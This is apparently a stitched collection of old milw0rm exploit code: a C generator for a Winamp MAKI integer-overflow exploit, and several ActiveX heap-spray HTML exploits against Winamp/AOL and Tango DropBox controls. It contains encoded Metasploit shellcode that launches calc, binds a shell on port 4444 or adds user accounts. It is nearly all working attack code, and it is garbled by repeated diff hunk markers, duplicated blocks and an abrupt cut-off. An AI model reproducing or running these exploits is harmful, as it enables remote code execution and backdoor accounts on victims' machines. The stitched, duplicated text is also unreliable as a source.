0xF4, 0x71, 0x36, 0x55, 0x40, 0x0B, 0x82, 0x02, 0x03, 0xD4, 0xAB, 0x3A,
0x87, 0x4D, 0x87, 0x8D, 0x12, 0x32, 0x6F, 0xAD, 0xFC, 0xD5, 0x83, 0xC2,
0xDE, 0x24, 0x6E, 0xB7, 0x36, 0x4A, 0x8C, 0xCC, 0x9E, 0x24, 0xC4, 0x6B,
0x6C, 0x73, 0x37, 0x00
};
/*Trigger the Integer overflow*/
unsigned char Exception [] =
{
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF
};
/* win32_exec - EXITFUNC=seh CMD=Calc Size=343
Encoder=PexAlphaNum http://metasploit.com */
char Calc_ShellCode [] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x50\x42\x30\x42\x50\x4b\x58\x45\x34\x4e\x43\x4b\x48\x4e\x37"
"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x55\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x48"
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54"
"\x4b\x58\x4f\x35\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
"\x41\x30\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x46\x4b\x38\x42\x54\x42\x33\x45\x38\x42\x4c\x4a\x57"
"\x4e\x50\x4b\x58\x42\x54\x4e\x50\x4b\x48\x42\x37\x4e\x31\x4d\x4a"
"\x4b\x48\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
"\x42\x30\x42\x50\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x45\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
"\x42\x35\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x34\x41\x36"
"\x4e\x46\x43\x36\x42\x50\x5a";
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=709
Encoder=PexAlphaNum http://metasploit.com */
char Bind_Shellcode [] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"
"\x4e\x36\x46\x52\x46\x42\x4b\x58\x45\x54\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x48"
"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x58"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x38\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x42\x4a\x42\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x54"
"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x50\x4e\x42\x4b\x38"
"\x49\x48\x4e\x56\x46\x42\x4e\x31\x41\x56\x43\x4c\x41\x33\x4b\x4d"
"\x46\x56\x4b\x48\x43\x34\x42\x33\x4b\x48\x42\x44\x4e\x30\x4b\x48"
"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x30\x50\x45\x4a\x46"
"\x50\x38\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
"\x43\x45\x48\x36\x4a\x36\x43\x53\x44\x53\x4a\x56\x47\x57\x43\x37"
"\x44\x53\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x58\x45\x4e"
"\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x56\x44\x30"
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x35\x43\x55\x43\x55\x43\x54"
"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x41\x51"
"\x4e\x55\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x49\x4a\x36\x46\x4a"
"\x4c\x31\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x56\x42\x41"
"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x45\x4e\x49\x34\x48\x58\x49\x54\x47\x45\x4f\x4f\x48\x4d"
"\x42\x55\x46\x45\x46\x55\x45\x35\x4f\x4f\x42\x4d\x43\x49\x4a\x36"
"\x47\x4e\x49\x47\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x55"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x56\x46\x46\x48\x36\x4a\x56\x43\x46"
"\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x32\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x46\x46\x44\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x42"
"\x43\x39\x4d\x48\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x44\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x45\x41\x45\x41\x55\x4c\x36"
"\x41\x30\x41\x35\x41\x45\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x46"
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f"
"\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
"\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x45\x43\x35\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a";
/* win32_adduser - PASS=n00b EXITFUNC=seh USER=n00b Size=489
Encoder=PexAlphaNum http://metasploit.com */
char Add_User_Shellcode [] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x57"
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x51\x4b\x38"
"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x48"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"
"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x44"
"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x58"
"\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43"
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x37\x4e\x41\x4d\x4a"
"\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x33\x4f\x35\x41\x43"
"\x48\x4f\x42\x56\x48\x35\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x37"
"\x42\x45\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x35\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x56"
"\x46\x56\x50\x52\x45\x36\x4a\x57\x45\x56\x42\x42\x4f\x32\x43\x46"
"\x42\x52\x50\x56\x45\x46\x46\x57\x42\x42\x45\x57\x43\x37\x45\x36"
"\x44\x57\x42\x32\x50\x46\x42\x43\x42\x53\x44\x56\x42\x42\x50\x36"
"\x42\x53\x42\x43\x44\x36\x42\x42\x4f\x32\x41\x54\x46\x44\x46\x44"
"\x42\x42\x48\x32\x48\x52\x42\x52\x50\x36\x45\x56\x46\x47\x42\x52"
"\x4e\x56\x4f\x36\x43\x36\x41\x56\x4e\x56\x47\x56\x44\x57\x4f\x56"
"\x45\x47\x42\x37\x42\x42\x41\x54\x46\x46\x4d\x56\x49\x46\x50\x56"
"\x49\x46\x43\x57\x46\x57\x44\x37\x41\x56\x46\x37\x4f\x36\x44\x57"
"\x43\x47\x42\x42\x50\x46\x42\x43\x42\x33\x44\x46\x42\x42\x4f\x52"
"\x41\x44\x46\x44\x46\x44\x42\x30\x5a";
unsigned char Junk1 ='A';
int main()
{
FILE *fp;
int i;
if ((fp = fopen(MAKI, "wb")) == NULL)
{
printf("File %s write error\n", MAKI);
return(0);
}
for (i=0; i<sizeof(First_Header); i++)
fputc(First_Header[i], fp);
for (i=0; i<sizeof(Exception); i++)
fputc(Exception[i], fp);
for (i=0;i<16751;i++)
{
fwrite(&Junk1,1,1,fp);
}
fputs("\xeb\x06\x90\x90",fp);/*Pointer to next seh record */
fputs("\x7C\x14\xF0\x12",fp);/*SE handler Universal adress 12F0147C */
int input;
printf("\n------------------------------------------------------");
printf("\nWinamp 5.551 MAKI Parsing Integer Overflow Exploit !!!");
printf("\n\nExploit created by n00b");
printf( "\n[1]. Calc Shell_Code" );
printf( "\n[2]. Bind Shell_Code on port 4444" );
printf( "\n[3]. Add user Shell_Code" );
printf( "\n[4]. To exit and cancel" );
printf( "\nPlease chose your Shell_Code:" );
scanf( "%d", &input );
switch ( input )
{
case 1:
for (i=0; i<sizeof(Calc_ShellCode); i++)
fputc(Calc_ShellCode[i], fp);
break;
case 2:
for (i=0; i<sizeof(Bind_Shellcode); i++)
fputc(Bind_Shellcode[i], fp);
break;
case 3:
for (i=0; i<sizeof(Add_User_Shellcode); i++)
fputc(Add_User_Shellcode[i], fp);
break;
case 4:
return 0;
break;
}
fclose(fp);
return 0;
}
// milw0rm.com [2009-05-26]


@ -1,50 +1,50 @@
<html>
<!--
+++++++++++++++++++++++
+Last Modified by lhoang8500++
+++++++++++++++++++++++
-->
<html>
<object classid="CLSID:7EC7B6C5-25BD-4586-A641-D2ACBB6629DD" id="target"></OBJECT>
<SCRIPT language="javascript">
var heapSprayToAddress = 0x05050505;
var payLoadCode = unescape("%uc931%ue983%ud9b0%ud9ee%u2474%u5bf4%u7381%u2713%uf3fc%u830c%ufceb%uf4e2%u96db%u4118%u05cf%uf30c%u9cd8%u6078%ud803%u4978%u771b%u098f%ufd5f%u871c%ue468%u5378%ufd07%u4518%uc8ac%u0d78%ucdc9%u9533%u788b%u7833%u3d20%u0139%u3e26%uf818%ua81c%u24d7%u1952%u5378%ufd03%u6a18%uf0ac%u87b8%ue078%ue7f2%ud024%u8578%ud84b%u6def%ucde4%u6828%ubfac%u87c3%uf067%u7c78%u513b%u4c78%ua22f%u829b%uf269%u5c1f%u2ad8%u5f95%u9441%u3ec0%u8b4f%u3e80%ua878%udc0c%u374f%uf01e%uac1c%uda0c%u7578%u6a16%u11a6%u0efb%u9672%uf3f1%u94f7%u052a%u51d2%uf3a4%uaff1%u5fa0%uaf74%u5fb0%uaf64%udc0c%u9441%u50e2%uaf41%ued7a%u94b2%u1657%u3b57%uf3a4%u96f1%u5de3%u0372%u6423%u5183%ue5dd%u0370%u5f25%u0372%u6423%ub5c2%u4575%u0370%u5c25%ua873%uf3a6%u6ff7%ueb9b%u3a5e%u5b8a%u2ad8%uf3a6%u9af7%u6899%u9441%u6190%u19ae%u5c99%ud57e%u853f%u96c0%u85b7%ucdc5%uff33%u028d%u21b1%ubed9%u9fdf%u86aa%ua7cb%u578c%u7e9b%u4fd9%uf3e5%ub852%uda0c%uab7c%u5da1%uad76%u0d99%uad76%u5da6%u2cd8%ua19b%uf9fe%u5f3d%u2ad8%uf399%ucbd8%udc0c%uabac%u8f0f%u98e3%uda0c%u0375%u6423%u76d7%u53f7%u0374%uf325%ufcf7%u0cf3%u0000");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
};
var buffer = unescape("%u0505");
while (buffer.length < 845) buffer+='\x0A';
while (buffer.length< 1000) buffer+=unescape("%u0505");
target.GetComponentVersion(buffer);
</script>
</html>
# milw0rm.com [2007-07-31]
<html>
<!--
+++++++++++++++++++++++
+Last Modified by lhoang8500++
+++++++++++++++++++++++
-->
<html>
<object classid="CLSID:7EC7B6C5-25BD-4586-A641-D2ACBB6629DD" id="target"></OBJECT>
<SCRIPT language="javascript">
var heapSprayToAddress = 0x05050505;
var payLoadCode = unescape("%uc931%ue983%ud9b0%ud9ee%u2474%u5bf4%u7381%u2713%uf3fc%u830c%ufceb%uf4e2%u96db%u4118%u05cf%uf30c%u9cd8%u6078%ud803%u4978%u771b%u098f%ufd5f%u871c%ue468%u5378%ufd07%u4518%uc8ac%u0d78%ucdc9%u9533%u788b%u7833%u3d20%u0139%u3e26%uf818%ua81c%u24d7%u1952%u5378%ufd03%u6a18%uf0ac%u87b8%ue078%ue7f2%ud024%u8578%ud84b%u6def%ucde4%u6828%ubfac%u87c3%uf067%u7c78%u513b%u4c78%ua22f%u829b%uf269%u5c1f%u2ad8%u5f95%u9441%u3ec0%u8b4f%u3e80%ua878%udc0c%u374f%uf01e%uac1c%uda0c%u7578%u6a16%u11a6%u0efb%u9672%uf3f1%u94f7%u052a%u51d2%uf3a4%uaff1%u5fa0%uaf74%u5fb0%uaf64%udc0c%u9441%u50e2%uaf41%ued7a%u94b2%u1657%u3b57%uf3a4%u96f1%u5de3%u0372%u6423%u5183%ue5dd%u0370%u5f25%u0372%u6423%ub5c2%u4575%u0370%u5c25%ua873%uf3a6%u6ff7%ueb9b%u3a5e%u5b8a%u2ad8%uf3a6%u9af7%u6899%u9441%u6190%u19ae%u5c99%ud57e%u853f%u96c0%u85b7%ucdc5%uff33%u028d%u21b1%ubed9%u9fdf%u86aa%ua7cb%u578c%u7e9b%u4fd9%uf3e5%ub852%uda0c%uab7c%u5da1%uad76%u0d99%uad76%u5da6%u2cd8%ua19b%uf9fe%u5f3d%u2ad8%uf399%ucbd8%udc0c%uabac%u8f0f%u98e3%uda0c%u0375%u6423%u76d7%u53f7%u0374%uf325%ufcf7%u0cf3%u0000");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
};
var buffer = unescape("%u0505");
while (buffer.length < 845) buffer+='\x0A';
while (buffer.length< 1000) buffer+=unescape("%u0505");
target.GetComponentVersion(buffer);
</script>
</html>
# milw0rm.com [2007-07-31]


@ -1,81 +1,81 @@
<!--
AOL IWinAmpActiveX Class (AmpX.dll 2.4.0.6) ConvertFile() remote overflow exploit (IE6/IE7)
by rgod
site: http://retrogod.altervista.org/
Notes by Nine:Situations:Group : an old unreleased one from rgod's archive,
*not* the same of http://www.kb.cert.org/vuls/id/568681
*not* the same of http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=623
(different clsid)
No one talks about the ConvertFile() method...
STILL FUCKING WORKSSSSS LOL!!!
AOL still serves the cab with the vulnerable control!!!
It seems to me that this is exploited in the wild:
http://www.google.com/search?q=FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6&hl=en&num=100&filter=0
details:
CLSID: {FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6}
Progid: WinAmpX.IWinAmpActiveX.2
Binary Path: C:\PROGRA~1\COMMON~1\Nullsoft\ActiveX\2.4\AmpX.dll
KillBitted: False
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
-->
<HTML>
<OBJECT classid='clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6' width=1 height=1 id='IWinAmpActiveX'
codebase="http://pdl.stream.aol.com/downloads/aol/unagi/ampx_en_dl.cab">
</OBJECT>
<script language='javascript'>
//add user one, user "sun" pass "tzu"
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<666;i++){memory[i] = block+shellcode}
</script>
<SCRIPT language='VBScript'>
'first block must set eax to 0xffffffff, the second one overwrites seh
bof=string(1400,unescape("%ff")) + string(1000,unescape("%0c"))
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
</SCRIPT>
</HTML>
# milw0rm.com [2009-05-19]
<!--
AOL IWinAmpActiveX Class (AmpX.dll 2.4.0.6) ConvertFile() remote overflow exploit (IE6/IE7)
by rgod
site: http://retrogod.altervista.org/
Notes by Nine:Situations:Group : an old unreleased one from rgod's archive,
*not* the same of http://www.kb.cert.org/vuls/id/568681
*not* the same of http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=623
(different clsid)
No one talks about the ConvertFile() method...
STILL FUCKING WORKSSSSS LOL!!!
AOL still serves the cab with the vulnerable control!!!
It seems to me that this is exploited in the wild:
http://www.google.com/search?q=FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6&hl=en&num=100&filter=0
details:
CLSID: {FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6}
Progid: WinAmpX.IWinAmpActiveX.2
Binary Path: C:\PROGRA~1\COMMON~1\Nullsoft\ActiveX\2.4\AmpX.dll
KillBitted: False
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
-->
<HTML>
<OBJECT classid='clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6' width=1 height=1 id='IWinAmpActiveX'
codebase="http://pdl.stream.aol.com/downloads/aol/unagi/ampx_en_dl.cab">
</OBJECT>
<script language='javascript'>
//add user one, user "sun" pass "tzu"
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<666;i++){memory[i] = block+shellcode}
</script>
<SCRIPT language='VBScript'>
'first block must set eax to 0xffffffff, the second one overwrites seh
bof=string(1400,unescape("%ff")) + string(1000,unescape("%0c"))
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
</SCRIPT>
</HTML>
# milw0rm.com [2009-05-19]


@ -0,0 +1,72 @@
<HTML>
<BODY>
<input language=JavaScript onclick=Tryme() type=button value="Launch Calc">
<object id=boom classid="clsid:{C915F573-4C11-4968-9080-29E611FDBE9F}"></object>
<br>Tango DropBox Activex Heap Spray Exploit</br>
<br>Version:3.1.5 + PRO</br>
<br>The vulnerability lies in the COM component used eSellerateControl350.dll (3.6.5.0) method of the ''GetWebStoreURL' member.</br>
<br>Vendor Homepage:http://etonica.com/dropbox/index.html</br>
<br>Software Link:http://etonica.com/dropbox/download.html</br>
<br>Author: metacom</br>
<!--Video Poc:http://bit.ly/1K0hnYS -->
<SCRIPT>
var heapspray=unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
var sprayContainer = unescape("%u9090%u9090");
var heapToAddress = 0x0a0a0a0a;
function Tryme()
{
var size_buff = 5000;
var x = unescape("%0a%0a%0a%0a");
while (x.length<size_buff) x += x;
x = x.substring(0,size_buff);
boom.GetWebStoreURL(x, 1);
}
function getsprayContainer(sprayContainer, sprayContainerSize)
